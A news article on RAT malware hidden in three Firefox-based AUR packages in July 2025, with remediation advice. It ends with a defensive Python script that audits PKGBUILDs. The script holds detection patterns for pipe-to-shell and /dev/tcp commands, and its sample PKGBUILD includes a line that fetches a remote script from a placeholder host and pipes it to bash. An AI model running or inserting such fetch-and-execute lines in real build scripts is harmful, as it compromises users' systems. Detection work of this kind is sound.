Arch Linux users urged to delete Firefox browser packages after discovery of malware in the Arch User Repository.

Arch Linux users have been urged to delete several community-maintained Firefox-based browser packages following the discovery of malware in the Arch User Repository (AUR). Security researchers and Arch maintainers identified multiple packages that were distributing a Remote Access Trojan (RAT), prompting swift action to mitigate the threat.

Discovery of Malicious Packages

The affected packages, firefox-patch-bin, librewolf-fix-bin, and zen-browser-patched-bin, were uploaded to the AUR on July 16, 2025, and remained available for approximately 46 hours before being taken offline on July 18. All three packages were found to execute malicious code at installation, silently infecting systems with a modified variant of the CHAOS Remote Access Trojan (RAT).

These packages are forks or customized builds of Mozilla Firefox, aimed at offering additional features or improved user privacy. Given their appeal to security-conscious users, the compromised versions were particularly insidious.

Attack Vector and Functionality

The malware was introduced via installation scripts embedded within the PKGBUILD files of the packages. These scripts fetched and executed additional payloads from a GitHub repository controlled by the attacker. Once deployed, the malware established persistent remote access to the user’s system, granting the attacker full control.

The use of a public repository and open-source build scripts meant there were no immediate red flags — unless a user manually inspected the code before installation. While the AUR is a cornerstone of Arch Linux’s ecosystem, it is also decentralized and relies heavily on community vigilance rather than automated security vetting.

Official Response and Recommendations

The Arch Linux team responded quickly by removing the malicious packages and issuing a formal security advisory. Users who installed any of the compromised packages are being advised to:

  • Immediately uninstall the affected packages
  • Reboot their systems
  • Audit system activity and logs for suspicious behavior
  • Change all passwords and invalidate session tokens
  • Consider performing a clean system rebuild from trusted sources

The Arch community has reiterated the long-standing guidance to review PKGBUILD files and associated scripts prior to installation, particularly for high-risk applications such as web browsers.
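A minimal static check of the kind that such a review implies, written for this article as an illustration (it is not Arch or AUR tooling): it flags fetch or execute commands inside build functions and install hooks, where makepkg's source= checksum verification does not apply. The sample PKGBUILD is constructed, and its package name and URLs are placeholders.

```python
"""Flag downloads or code execution inside PKGBUILD build functions or install
hooks, where makepkg's source= checksum verification does not apply (the
pattern described above). Added example, not Arch tooling; sample is constructed."""
import re

# Patterns that pull or run remote content at build/install time.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|git\s+clone|base64\s+(-d|--decode)|eval|nohup)\b"
    r"|\|\s*(ba)?sh\b|/dev/tcp/"
)
# Start of a bash function body, e.g. "package() {" or "package_foo-bin() {".
FUNC_START = re.compile(r"^\s*([A-Za-z_][\w-]*)\s*\(\)\s*\{?\s*$")

def audit_pkgbuild(text: str) -> list[dict]:
    """Return findings as {'line', 'context', 'reason'}; empty list if clean."""
    findings = []
    current = None  # name of the function whose body we are inside
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].rstrip()  # drop comments (coarse: also cuts '#' in strings)
        if not line:
            continue
        m = FUNC_START.match(line)
        if current is None and m:
            current = m.group(1)
        elif current and line == "}":  # PKGBUILD convention: closing brace in column 0
            current = None
        elif current and SUSPICIOUS.search(line):
            findings.append({"line": lineno, "context": current,
                             "reason": "fetch/exec inside build function bypasses source= checksums"})
        elif current is None and re.match(r"\s*install=", line):
            findings.append({"line": lineno, "context": "global",
                             "reason": "install= hook runs as root at install time; review it too"})
        elif current is None and "SKIP" in line:
            findings.append({"line": lineno, "context": "global",
                             "reason": "checksum SKIP disables integrity verification for a source"})
    return findings

SAMPLE_PKGBUILD = """\
# Constructed sample PKGBUILD; names and URLs are placeholders
pkgname=example-browser-patched-bin
pkgver=1.0
install=example.install
source=("https://example.invalid/browser-$pkgver.tar.xz")
sha256sums=('SKIP')
package() {
    tar -xf "browser-$pkgver.tar.xz" -C "$pkgdir"
    curl -fsSL https://example.invalid/stage2.sh | bash
}
"""
```

Run `audit_pkgbuild(open("PKGBUILD").read())` on a fetched AUR checkout; a clean package whose functions only unpack and copy files listed in source= produces no findings.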
